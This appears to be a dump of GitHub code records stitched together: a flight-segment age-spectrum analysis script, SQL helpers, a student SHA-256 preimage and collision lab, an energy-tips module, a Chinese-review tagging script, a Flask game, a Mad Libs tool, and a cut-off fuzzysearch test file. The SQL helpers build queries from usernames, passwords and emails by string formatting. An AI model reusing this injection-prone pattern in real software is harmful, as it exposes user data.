all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf11.append(best_k)\n r2_rf11.append(my_r2)\n mean_rf11.append(mean_age)\n mode_rf11.append(mode_age)\n # ----- save to dataframes\n utbl_rf11[col] = np.ndarray.flatten(my_utbl)\n mustar_rf11[col] = np.ndarray.flatten(my_mustar)\n tau_rf11[col] = np.ndarray.flatten(my_tau)\n gf_rf11[col] = np.ndarray.flatten(my_gf)\n t_rf11[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf11 = seg_info[seg_info['Flight'] == 'RF11']\n\nsegment_info_rf11['r squared'] = r2_rf11\nsegment_info_rf11['mean age'] = mean_rf11\nsegment_info_rf11['mode age'] = mode_rf11\nsegment_info_rf11['best k'] = bestk_rf11\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf11.pkl')\n\n# save others \nutbl_rf11.to_pickle('./perflight_output/utbl_rf11.pkl')\nmustar_rf11.to_pickle('./perflight_output/mustar_rf11.pkl')\ntau_rf11.to_pickle('./perflight_output/tau_rf11.pkl')\ngf_rf11.to_pickle('./perflight_output/gf_rf11.pkl')\nt_rf11.to_pickle('./perflight_output/t_rf11.pkl')\n\n\n\n#####################################################################################################\n################################ \t\tRF 12 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf12 = []\nmean_rf12 = []\nmode_rf12 = []\nnum = []\nbestk_rf12 = []\n\nutbl_rf12 = pd.DataFrame()\nmustar_rf12 = pd.DataFrame()\ngf_rf12 = pd.DataFrame()\nt_rf12 = pd.DataFrame()\ntau_rf12 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf12].columns: \n utbl_rf12[col] = ''\n mustar_rf12[col] = ''\n gf_rf12[col] = ''\n t_rf12[col] = ''\n tau_rf12[col] = ''\n\n# max length of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf12]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf12.append(best_k)\n r2_rf12.append(my_r2)\n mean_rf12.append(mean_age)\n mode_rf12.append(mode_age)\n # ----- save to dataframes\n utbl_rf12[col] = np.ndarray.flatten(my_utbl)\n mustar_rf12[col] = np.ndarray.flatten(my_mustar)\n tau_rf12[col] = np.ndarray.flatten(my_tau)\n gf_rf12[col] = np.ndarray.flatten(my_gf)\n t_rf12[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf12 = seg_info[seg_info['Flight'] == 'RF12']\n\nsegment_info_rf12['r squared'] = r2_rf12\nsegment_info_rf12['mean age'] = mean_rf12\nsegment_info_rf12['mode age'] = mode_rf12\nsegment_info_rf12['best k'] = bestk_rf12\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf12.pkl')\n\n# save others \nutbl_rf12.to_pickle('./perflight_output/utbl_rf12.pkl')\nmustar_rf12.to_pickle('./perflight_output/mustar_rf12.pkl')\ntau_rf12.to_pickle('./perflight_output/tau_rf12.pkl')\ngf_rf12.to_pickle('./perflight_output/gf_rf12.pkl')\nt_rf12.to_pickle('./perflight_output/t_rf12.pkl')\n\n\n#####################################################################################################\n################################ \t\tRF 13 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf13 = []\nmean_rf13 = []\nmode_rf13 = []\nnum = []\nbestk_rf13 = []\n\nutbl_rf13 = pd.DataFrame()\nmustar_rf13 = pd.DataFrame()\ngf_rf13 = pd.DataFrame()\nt_rf13 = pd.DataFrame()\ntau_rf13 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf13].columns: \n utbl_rf13[col] = ''\n mustar_rf13[col] = ''\n gf_rf13[col] = ''\n t_rf13[col] = ''\n tau_rf13[col] = ''\n\n# max length of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf13]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf13.append(best_k)\n r2_rf13.append(my_r2)\n mean_rf13.append(mean_age)\n mode_rf13.append(mode_age)\n # ----- save to dataframes\n utbl_rf13[col] = np.ndarray.flatten(my_utbl)\n mustar_rf13[col] = np.ndarray.flatten(my_mustar)\n tau_rf13[col] = np.ndarray.flatten(my_tau)\n gf_rf13[col] = np.ndarray.flatten(my_gf)\n t_rf13[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf13 = seg_info[seg_info['Flight'] == 'RF13']\n\nsegment_info_rf13['r squared'] = r2_rf13\nsegment_info_rf13['mean age'] = mean_rf13\nsegment_info_rf13['mode age'] = mode_rf13\nsegment_info_rf13['best k'] = bestk_rf13\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf13.pkl')\n\n# save others \nutbl_rf13.to_pickle('./perflight_output/utbl_rf13.pkl')\nmustar_rf13.to_pickle('./perflight_output/mustar_rf13.pkl')\ntau_rf13.to_pickle('./perflight_output/tau_rf13.pkl')\ngf_rf13.to_pickle('./perflight_output/gf_rf13.pkl')\nt_rf13.to_pickle('./perflight_output/t_rf13.pkl')\n\n\n\n#####################################################################################################\n################################ \t\tRF 14 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf14 = []\nmean_rf14 = []\nmode_rf14 = []\nnum = []\nbestk_rf14 = []\n\nutbl_rf14 = pd.DataFrame()\nmustar_rf14 = pd.DataFrame()\ngf_rf14 = pd.DataFrame()\nt_rf14 = pd.DataFrame()\ntau_rf14 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf14].columns: \n utbl_rf14[col] = ''\n mustar_rf14[col] = ''\n gf_rf14[col] = ''\n t_rf14[col] = ''\n tau_rf14[col] = ''\n\n# max length of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf14]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf14.append(best_k)\n r2_rf14.append(my_r2)\n mean_rf14.append(mean_age)\n mode_rf14.append(mode_age)\n # ----- save to dataframes\n utbl_rf14[col] = np.ndarray.flatten(my_utbl)\n mustar_rf14[col] = np.ndarray.flatten(my_mustar)\n tau_rf14[col] = np.ndarray.flatten(my_tau)\n gf_rf14[col] = np.ndarray.flatten(my_gf)\n t_rf14[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf14 = seg_info[seg_info['Flight'] == 'RF14']\n\nsegment_info_rf14['r squared'] = r2_rf14\nsegment_info_rf14['mean age'] = mean_rf14\nsegment_info_rf14['mode age'] = mode_rf14\nsegment_info_rf14['best k'] = bestk_rf14\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf14.pkl')\n\n# save others \nutbl_rf14.to_pickle('./perflight_output/utbl_rf14.pkl')\nmustar_rf14.to_pickle('./perflight_output/mustar_rf14.pkl')\ntau_rf14.to_pickle('./perflight_output/tau_rf14.pkl')\ngf_rf14.to_pickle('./perflight_output/gf_rf14.pkl')\nt_rf14.to_pickle('./perflight_output/t_rf14.pkl')\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"schelpon/TTS_2020_MD2","sub_path":"get_tts/tts_vary_ut/get_tts_vary_ut_segments_split.py","file_name":"get_tts_vary_ut_segments_split.py","file_ext":"py","file_size_in_byte":31479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"20911702014","text":"def sql(cur, query):\n cur.execute(query)\n\n# Return a list of tuples\n# Example: [(1, 'abc'), (2, 'This is 2')]\n# Example: [(1,)]\ndef sql_select(cur, query):\n cur.execute(query)\n return cur.fetchall()\n\n## Helper functions\ndef insert_new_person(cursor, new_person):\n # Add the requester\n query = r\"\"\"\n SELECT\n insert_one_person('{}', '{}', '{}', '{}')\n ;\n \"\"\".format(new_person.username, new_person.password, new_person.email, new_person.created_dt)\n\n try:\n sql(cursor, query)\n except Exception as e:\n raise e\n\ndef insert_new_task(cursor, task_dummy):\n query = r\"\"\"\n SELECT\n insert_one_task('{}', '{}', {}, '{}', '{}', '{}', '{}', {})\n ;\n \"\"\".format( task_dummy.title, task_dummy.description, task_dummy.category_id, task_dummy.location,\n task_dummy.requester, task_dummy.start_dt, task_dummy.end_dt, task_dummy.price\n )\n try:\n sql(cursor, query)\n except Exception as e:\n raise e\n\ndef get_new_task_id(cursor, task_dummy):\n query = r\"\"\"\n SELECT id\n FROM task\n WHERE 1=1\n AND task.title = '{}'\n AND task.description = '{}'\n AND task.category_id = '{}'\n AND task.location = '{}'\n AND task.requester = '{}'\n AND task.start_dt = '{}'\n AND task.end_dt = '{}'\n AND task.price = '{}'\n AND task.status_task = 'open'\n AND task.assignee IS NULL\n ;\n \"\"\".format(task_dummy.title, task_dummy.description, task_dummy.category_id, task_dummy.location,\n task_dummy.requester, task_dummy.start_dt, task_dummy.end_dt, task_dummy.price)\n\n try:\n data = sql_select(cursor, query)\n return data[0][0]\n except Exception as e:\n raise e\n\ndef get_new_offer_id(cursor, task_id, offer_dummy):\n query = r\"\"\"\n SELECT offer.id\n FROM offer\n WHERE 1=1\n AND offer.task_id = {}\n AND offer.assignee = '{}'\n ;\n \"\"\".format(task_id, offer_dummy.assignee)\n\n try:\n data = sql_select(cursor, query)\n return data[0][0]\n except Exception as e:\n raise e\n","repo_name":"karrui/taskrr","sub_path":"test/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"19443397792","text":"import hashlib\nimport math\nimport os\nimport time\nimport matplotlib.pyplot as plt\n\ndef one_wayness():\n #txt = input(\"Enter string to hash: \")\n #print(hashlib.sha256(txt.encode()).hexdigest())\n\n print(\"10 example hashes:\")\n for i in range(10):\n print(hashlib.sha256(os.urandom(256)).hexdigest())\n\n\n print(\"\\n2 hashes with hamming distance:\")\n print(hashlib.sha256(\"Example string 1\".encode()).hexdigest())\n print(hashlib.sha256(\"Example string 2\".encode()).hexdigest())\n print()\n\n\ndef preimage_res(target):\n print(\"Call for target: 0x{:064X}\" .format(target))\n\n i = 1\n while True:\n hash_val = int.from_bytes(hashlib.sha256(os.urandom(20)).digest(), 'big')\n if target > hash_val:\n break\n i += 1\n print(\"#Inputs: {}\\n targetVal: 0x{:064X}\\n digest: \\t0x{:064X}\\n\" .format(i, target, hash_val))\n return i\n\n\ndef collision_res():\n num_of_loops = 5\n\n bits_list = [list() for x in range(num_of_loops)]\n dict_list = [list() for x in range(num_of_loops)]\n time_list = [list() for x in range(num_of_loops)]\n\n dict_hashs = dict()\n\n for i in range(num_of_loops):\n print(\"test {}\".format(i))\n bits = 8\n while 50 >= bits:\n bits_list[i].append(bits)\n start_time = time.process_time()\n while True:\n value = os.urandom(20)\n # generate key and get only desired number of bytes\n key = int.from_bytes(hashlib.sha256(os.urandom(20)).digest()[0:(math.ceil(bits / 8))], 'big')\n # shift bytes so only 12 bits are left for comparison\n key = key >> ((math.ceil(bits / 8) * 8) - bits)\n # create dict\n if key in dict_hashs:\n if value != dict_hashs[key]:\n elapsed_time = (time.process_time() - start_time)\n time_list[i].append(elapsed_time)\n dict_list[i].append(len(dict_hashs) / 1000)\n print(\"Found duplicate with {} bits, needed {:.0f} s #inputs {}k\\nhash1: 0x{:020X}\\nInput1: 0x{:040X}\\nInput2: 0x{:040X}\\n\" .format(bits, elapsed_time, len(dict_hashs) / 1000, key, int.from_bytes(dict_hashs[key], 'big'), int.from_bytes(value, 'big')))\n break\n else:\n dict_hashs[key] = value\n dict_hashs.clear()\n bits += 2\n\n #calculate mean\n bits_mean_list = []\n dict_mean_list = []\n time_mean_list = []\n for i in range(len(bits_list[0])):\n bits_mean = 0\n dict_mean = 0\n time_mean = 0\n for j in range(num_of_loops):\n bits_mean += bits_list[j][i]\n dict_mean += dict_list[j][i]\n time_mean += time_list[j][i]\n bits_mean_list.append(bits_mean/float(num_of_loops))\n dict_mean_list.append(dict_mean/float(num_of_loops))\n time_mean_list.append(time_mean/float(num_of_loops))\n\n print(bits_mean_list)\n print(dict_mean_list)\n print(time_mean_list)\n\n #plotting graphs\n fig = plt.figure()\n for j in range(num_of_loops):\n plt.plot(bits_list[j], dict_list[j], ':')\n plt.plot(bits_mean_list, dict_mean_list, color='red')\n plt.xlabel('digest size [bits]')\n plt.ylabel('# of inputs [k]')\n fig.savefig('plot_num_input.png', dpi=500, bbox_inches='tight')\n fig.savefig('plot_num_input.svg', format='svg', dpi=500, bbox_inches='tight')\n\n fig1 = plt.figure()\n for j in range(num_of_loops):\n plt.plot(bits_list[j], time_list[j], ':')\n plt.plot(bits_mean_list, time_mean_list, color='red')\n plt.xlabel('digest size [bits]')\n plt.ylabel('collision time [s]')\n fig1.savefig('plot_time.png', dpi=500, bbox_inches='tight')\n fig1.savefig('plot_time.svg', format='svg', dpi=500, bbox_inches='tight')\n\n\nif __name__ == '__main__':\n one_wayness()\n\n t1 = 0x0FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\n t2 = 0x00FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\n t3 = 0x000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\n t4 = 0x0000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\n t5 = 0x00000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\n preimage_res(t1)\n preimage_res(t2)\n preimage_res(t3)\n preimage_res(t4)\n preimage_res(t5)\n\n collision_res()\n","repo_name":"awilsee/CSec","sub_path":"Lab1/task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":4389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"74800784298","text":"from datetime import datetime\nfrom datetime import timedelta\nimport pandas as pd\n\n# Mocking out a db/storage scheme. We would ideally store these types of options per-user\nCONSUMERS = {\"electric_water_heater\": False, \"dishwasher\": True,\n \"electric_vehicle\": True, \"washer_dryer\": True,\n \"solar\": True}\nSOURCES = {\n \"smart meter\": False,\n \"home_energy_monitor\": False\n}\n\n\ndef readable_time(time):\n time = pd.to_datetime(time)\n return time.strftime(\"%I:%M %p\")\n\n\ndef get_max_renewable_time(caiso_dict):\n df = pd.DataFrame(caiso_dict)\n df['time'] = df.time.apply(lambda x: datetime.strptime(x, \"%H:%M:%S\"))\n max_renewable = df[df['value'] > df.value.quantile(.75)].iloc[0]['time']\n return max_renewable\n\n\ndef get_suggestions(caiso_dict):\n suggestions = []\n max_renewable_time = get_max_renewable_time(caiso_dict)\n if CONSUMERS['electric_vehicle']:\n t_end = pd.to_datetime(max_renewable_time) + timedelta(hours=3)\n message = \"Set your electric car to charge between {} and {} tomorow\".format(\n readable_time(max_renewable_time), readable_time(t_end))\n suggestions.append({\"time\": readable_time(max_renewable_time), \"message\": message})\n\n if CONSUMERS['dishwasher']:\n message = \"Load your dishwasher tonight and set it to run after {} tomorrow\".format(\n readable_time(max_renewable_time))\n suggestions.append({\"time\": readable_time(max_renewable_time), \"message\": message})\n\n if CONSUMERS['washer_dryer']:\n t = pd.to_datetime(max_renewable_time) + timedelta(hours=1)\n message = \"Load your dishwasher tonight and set it to run after {} tomorrow\".format(\n readable_time(t))\n suggestions.append({\"time\": readable_time(t), \"message\": message})\n\n if CONSUMERS['solar']:\n t = pd.to_datetime(max_renewable_time) + timedelta(hours=7.5)\n t_end = pd.to_datetime(max_renewable_time) + timedelta(hours=10.5)\n message = \"Pre-cool. Close drapes & windows. Program AC to run on max until {}. Then allow the temp to stay at 78 until {}\".format(\n readable_time(t), readable_time(t_end))\n suggestions.append({\"time\": readable_time(t), \"message\": message})\n\n return suggestions\n","repo_name":"Community-Energy-Labs/GridShiftHackathon2020_Repo","sub_path":"server/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"41475904660","text":"# -*- coding: utf-8 -*-\nimport jieba\nimport spacy\n\nprint('load model\\n')\nnlp = spacy.load(\"zh_core_web_lg\")\n\nwith open('./stops.txt', 'r', encoding='utf8') as f:\n global stopwords\n stopwords = f.read().split('\\n')\n \nstopwords.append('\\n')\nstopwords.append('\\n\\n')\nstopwords.append('\\n\\n\\n')\nstopwords.append('⋯')\nstopwords.append('😆')\nstopwords.append('📍')\nstopwords.append('🌟')\n\nprint('create stop words\\n\\n')\nnlp.Defaults.stop_words |= set(stopwords)\n\nprint('stop words created\\n')\n\n# filt stopwords和 不相關的詞\ndef filtStopWords(documents):\n words = set()\n i = 0\n \n doc = jieba.cut(documents.replace(' ', ''))\n for token in doc: \n if str(token) not in nlp.Defaults.stop_words:\n words.add(str(token))\n \n return words\n\nprint('filter test:\\n\\n')\n\n# 做embedding並產生vectors\ndef word2vec(words):\n vectors = []\n for word in words:\n vectors.append(nlp(word).vector.tolist())\n return vectors\n\ndef word2vec2(words):\n return [nlp(word).vector.tolist() for word in words]\n\n\nimport pymongo\n\nremoteUrl = \"mongodb://localhost:57017\"\nlocalUrl = \"mongodb://localhost:27017\"\nmyclient = pymongo.MongoClient(remoteUrl)\nmydb = myclient[\"gp\"]\nmycol = mydb[\"map\"]\n\nprint('connect mongo\\n')\n\ni = 1\ntotalWords = 0\ncount = 0 \nwordsdel = []\nwordskept = []\nnlpScenery = nlp(\"景點\")\nnlpSea = nlp(\"海\")\nnlpMuseum = nlp(\"博物館\")\nnlpForest = nlp('森林')\nnlpTrails = nlp('步道')\nnlpPark = nlp('公園')\n\nnlpWords = [nlpSea, nlpMuseum, nlpForest, nlpTrails, nlpPark]\n\ncursor = mycol.find({}, no_cursor_timeout=True,batch_size=10)\nfor doc in cursor:\n\n i += 1\n if i % 1000 == 0:\n print('\\n\\n\\n\\n\\n\\n')\n print('-------------------------------------')\n print('\\n\\n\\\\n\\n\\n\\n')\n print(i)\n print('\\n\\n\\n\\n\\n\\n')\n print('-------------------------------------')\n print('\\n\\n\\\\n\\n\\n\\n')\n\n\n\n if 'food' not in doc[\"types\"] or 'restaurant' not in doc['types']:\n words = filtStopWords(doc['reviews'])\n\n # test each word in words' similarity \n\n phraseskept = []\n\n for word in words:\n totalWords += 1\n nlpWord = nlp(word)\n\n keepWord = False\n # print(word,end=' ')\n for testWord in nlpWords:\n similarityScore = nlpWord.similarity(testWord)\n if similarityScore > 0.35:\n keepWord = True\n # print(round(similarityScore,3),end=' ')\n # print()\n\n if nlpWord.similarity(nlpScenery) >= 0.3 or keepWord: # and nlpWord.similarity(nlpLandscape)\n phraseskept.append(word)\n wordskept.append(word)\n count += 1\n\n print(doc['name'])\n print(doc['types'])\n print(phraseskept)\n print('\\n')\n\n vectors = word2vec(phraseskept)\n query = {\"place_id\": doc['place_id']}\n newvalues = {\"$set\": {\"reviews_spacy\": vectors,\n \"tags\": phraseskept}}\n mycol.update_one(query, newvalues)\n\n\n \n \n\n\ncursor.close()\nmyclient.close()\nprint(wordskept)\n\n'''\n\nprint(count)\nprint(totalWords)\n\nnlpWords.append(nlpScenery)\n\nfor word in wordskept:\n print(word)\n for testWord in nlpWords:\n print(round(nlp(word).similarity(testWord),3), end=' ')\n print()\n\n''' \n\n\n\n \n","repo_name":"NCCUCSGraduateProject/Graduate_Project","sub_path":"word2vec/scenery.py","file_name":"scenery.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"16445844790","text":"from flask import Flask\nimport random\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef Game():\n return \"<h1> Guess a number between 0 and 9 </h1>\" \\\n \"<img src = 'https://media.giphy.com/media/3o7aCSPqXE5C6T8tBC/giphy.gif' width=400, height=400>\"\n\ncomputer_select = random.randint(0,9)\n\n@app.route(\"/<int:num>\")\ndef guess(num):\n if(computer_select == num):\n return \"<h1> You found me! </h1>\" \\\n \"<img src = 'https://media.giphy.com/media/4T7e4DmcrP9du/giphy.gif' width=400, height=400>\"\n if (computer_select > num):\n return \"<h1> Too low, try again! </h1>\" \\\n \"<img src = 'https://media.giphy.com/media/jD4DwBtqPXRXa/giphy.gif' width=400, height=400>\"\n if (computer_select < num):\n return \"<h1> Too high, try again! </h1>\" \\\n \"<img src = 'https://media.giphy.com/media/3o6ZtaO9BZHcOjmErm/giphy.gif' width=400, height=400>\"\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"Suman-Adhikary/flask","sub_path":"Higher-Lower.py","file_name":"Higher-Lower.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"21527300356","text":"from pynput import keyboard\nimport os\nfrom Play import Play\nfrom Fonts import bcolors\n\nclass Create:\n def __init__(self):\n self.MasterListName = os.path.abspath(os.path.join(os.getcwd(), \"..\", \"MadLibs\", \"MasterList.txt\"))\n self.temp = 1\n self.title = \"\"\n self.mad_lib = \"\"\n self.done_input = False\n self.done_confirmed = False\n\n def start(self):\n print(\"Here, you can create your own Mad Lib!\")\n print(\"Create your story while prompting for\")\n print(\"some input from a player. To prompt a\")\n print(\"User for input, place your prompt between\")\n print(\"two asterisks(*). For example: *verb* and\")\n print(\"continue one with your story! To finish,\")\n print(\"press the Enter key, the Escape key, and \")\n print(\" then the Enter key again. \")\n print(\" Happy Libbing! \")\n self.get_title()\n self.start_keyboard_listener()\n should_continue = self.get_mad_lib_input()\n if should_continue:\n self.ask_play_made()\n\n def on_release(self, key):\n if key == keyboard.Key.esc:\n self.done_input = True\n\n def get_title(self):\n print(\"\\nPlease enter the title of your Mad Lib!\")\n self.title = input()\n\n def get_mad_lib_input(self):\n print(\"Please enter the Mad Lib!\")\n while not self.done_confirmed:\n while not self.done_input:\n new_input = input()\n self.mad_lib += new_input\n\n done = self.confirm_done()\n if not done:\n self.done_input = False\n else:\n self.done_confirmed = True\n check_successful = self.check_input()\n if check_successful:\n self.save_madlib()\n return True\n return False\n\n def check_input(self):\n asterisk_count = 0\n for character in self.mad_lib:\n if character == '*':\n asterisk_count += 1\n\n if asterisk_count % 2 != 0:\n print(f\"{bcolors.FAIL}Error: There was an uneven number of asterisks given in the input\")\n print(f\"{bcolors.WHITE}\")\n return False\n\n return True\n\n def save_madlib(self):\n title_valid = False\n while not title_valid:\n self.title = self.title.replace(' ', '')\n if self.title == \"\":\n print(f\"{bcolors.FAIL}Error: Madlib name is invalid. Please enter a new Title\")\n print(f\"{bcolors.WHITE}\")\n self.title = input()\n continue\n try:\n new_madlib_file = open(os.path.abspath(os.path.join(os.getcwd(), \"..\", \"MadLibs\", f\"{self.title}.txt\")), 'x')\n new_madlib_file.write(self.mad_lib)\n new_madlib_file.close()\n title_valid = True\n except IOError:\n print(f\"{bcolors.FAIL}Error: Madlib name is already taken. Please enter a new Title\")\n print(f\"{bcolors.WHITE}\")\n self.title = input()\n\n file = open(self.MasterListName, 'a')\n file.write(f\"\\n{self.title}\")\n file.close()\n\n @staticmethod\n def confirm_done():\n print(f\"{bcolors.WARNING}Are you sure that you are done inputting your mad lib? (Y/N)\")\n print(f\"{bcolors.WHITE}\")\n done = input().lower()\n if done in [\"y\", \"yes\", \"yep\"]:\n return True\n return False\n\n def start_keyboard_listener(self):\n self.listener = keyboard.Listener(\n on_release=self.on_release)\n self.listener.start()\n\n def ask_play_made(self):\n os.system('cls')\n print(\"Would you like to play the Mad Lib that was just created? (Y/N)\")\n answer = input().lower()\n if answer in [\"y\", \"yes\", \"yep\"]:\n play = Play()\n play.start_specific(self.title)\n","repo_name":"hudkinsnoah/Mad-Libs","sub_path":"src/Create.py","file_name":"Create.py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"16029015841","text":"from fuzzysearch.common import group_matches, Match, get_best_match_in_group, \\\n count_differences_with_maximum, consolidate_overlapping_matches\nfrom fuzzysearch.substitutions_only import \\\n has_near_match_substitutions as hnm_subs, \\\n find_near_matches_substitutions as fnm_subs, \\\n find_near_matches_substitutions_lp as fnm_subs_lp, \\\n has_near_match_substitutions_lp as hnm_subs_lp, \\\n find_near_matches_substitutions_ngrams as fnm_subs_ngrams, \\\n has_near_match_substitutions_ngrams as hnm_subs_ngrams\n\nfrom tests.compat import b, u, unittest\nfrom tests.utils import skip_if_arguments_arent_byteslike\n\n\nclass TestSubstitionsOnlyBase(object):\n def search(self, subsequence, sequence, max_subs):\n raise NotImplementedError\n\n def expectedOutcomes(self, search_result, expected_outcomes, *args, **kwargs):\n raise NotImplementedError\n\n def test_empty_sequence(self):\n self.expectedOutcomes(self.search(b('PATTERN'), b(''), max_subs=0), [])\n\n def test_empty_subsequence_exeption(self):\n with self.assertRaises(ValueError):\n self.search(b(''), b('TEXT'), max_subs=0)\n\n def test_match_identical_sequence(self):\n self.expectedOutcomes(\n self.search(b('PATTERN'), b('PATTERN'), max_subs=0),\n [Match(start=0, end=len('PATTERN'), dist=0, matched=b('PATTERN'))],\n )\n\n def test_substring(self):\n substring = b('PATTERN')\n text = b('aaaaaaaaaaPATTERNaaaaaaaaa')\n expected_match = Match(start=10, end=17, dist=0, matched=b('PATTERN'))\n\n self.expectedOutcomes(\n self.search(substring, text, max_subs=0),\n [expected_match],\n )\n self.expectedOutcomes(\n self.search(substring, text, max_subs=1),\n [expected_match],\n )\n self.expectedOutcomes(\n self.search(substring, text, max_subs=2),\n [expected_match],\n )\n\n def test_double_first_item(self):\n self.expectedOutcomes(\n self.search(b('def'), b('abcddefg'), max_subs=1),\n [Match(start=4, end=7, dist=0, 